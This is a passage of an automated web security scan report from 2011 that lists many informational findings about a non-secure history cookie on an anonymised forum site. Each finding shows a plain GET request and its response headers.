Path:   /docs/DOC-3374

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3374 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337343b3130322c333235313b3130322c333432363b3130322c333337353b3130322c333433313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=102916 t=1313157236205992
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.127. https://www.x.com/docs/DOC-3375

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3375

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3375 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337353b3130322c333432373b3130322c333434333b3130322c333433313b3130322c333432363b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b3130322c333631393b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=172605 t=1313157234881833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.128. https://www.x.com/docs/DOC-3426

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3426

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3426 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432363b3130322c333434343b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333432373b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=177923 t=1313157233753621
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.129. https://www.x.com/docs/DOC-3427

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3427

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3427 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:53 GMT; Path=/
Vary: User-Agent
JP: D=115565 t=1313157233228654
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.130. https://www.x.com/docs/DOC-3431

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3431

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3431 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333433313b3130322c333434343b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333536313b3130322c333536323b3130322c333631393b3130322c333638383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:54 GMT; Path=/
Vary: User-Agent
JP: D=173915 t=1313157234152384
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.131. https://www.x.com/docs/DOC-3443

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3443

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3443 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434333b3130322c333631393b3130322c333638383b3130322c333439313b3130322c333536313b3130322c333434343b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=98914 t=1313157232773548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.132. https://www.x.com/docs/DOC-3444

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3444

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3444 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333434343b3130322c333536313b3130322c333631393b3130322c333638383b3130322c333831323b3130322c333536323b3130322c333834313b3130322c313631333b3130322c313035313b3130322c313033313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=100315 t=1313157231659068
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.133. https://www.x.com/docs/DOC-3491

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3491

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3491 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333439313b3130322c333631393b3130322c333434343b3130322c333638383b3130322c333536313b3130322c333536323b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313035313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:52 GMT; Path=/
Vary: User-Agent
JP: D=218057 t=1313157232304538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.134. https://www.x.com/docs/DOC-3561

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3561

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3561 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536313b3130322c333834313b3130322c333638383b3130322c333631393b3130322c333536323b3130322c313631333b3130322c333831323b3130322c313035313b3130322c313033313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:51 GMT; Path=/
Vary: User-Agent
JP: D=135641 t=1313157231234077
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.135. https://www.x.com/docs/DOC-3562

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3562

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3562 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333536323b3130322c333638383b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313035313b3130322c333631393b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=175892 t=1313157230683229
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.136. https://www.x.com/docs/DOC-3619

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3619

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3619 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333631393b3130322c313631333b3130322c333831323b3130322c333834313b3130322c313035313b3130322c313033313b3130322c333638383b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:50 GMT; Path=/
Vary: User-Agent
JP: D=123460 t=1313157230328400
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.137. https://www.x.com/docs/DOC-3688

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3688

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3688 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333638383b3130322c333831323b3130322c333834313b3130322c313631333b3130322c313033313b3130322c313035313b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=147682 t=1313157229798103
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.138. https://www.x.com/docs/DOC-3811

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3811

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3811 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:39:54 GMT; Path=/
Vary: User-Agent
JP: D=104592 t=1313156394128506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.139. https://www.x.com/docs/DOC-3812

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3812

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3812 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333831323b3130322c313033313b3130322c313631333b3130322c313035313b3130322c313337323b3130322c333834313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=97831 t=1313157229433265
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.140. https://www.x.com/docs/DOC-3836

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3836

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3836 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333833363b3130322c323234313b3130322c333230313b3130322c313535313b3130322c333237313b3130322c333332313b3130322c333332323b3130322c333335313b3130322c333335323b3130322c333335333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:05 GMT; Path=/
Vary: User-Agent
JP: D=194903 t=1313157245590892
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.141. https://www.x.com/docs/DOC-3841

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3841

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3841 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333834313b3130322c333831323b3130322c313033313b3130322c313337323b3130322c313035313b3130322c313631333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:49 GMT; Path=/
Vary: User-Agent
JP: D=198718 t=1313157228930468
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.142. https://www.x.com/message/186684

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/186684

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/186684 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:40 GMT; Path=/
Vary: User-Agent
JP: D=137098 t=1313157519959178
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.143. https://www.x.com/message/198017

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/198017

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/198017 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:39 GMT; Path=/
Vary: User-Agent
JP: D=113649 t=1313157519428788
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.144. https://www.x.com/message/211333

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211333

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211333 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=58458 t=1313157516498640
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.145. https://www.x.com/message/211439

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211439

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211439 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333137323b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:36 GMT; Path=/
Vary: User-Agent
JP: D=102902 t=1313157516178631
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.146. https://www.x.com/message/211738

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
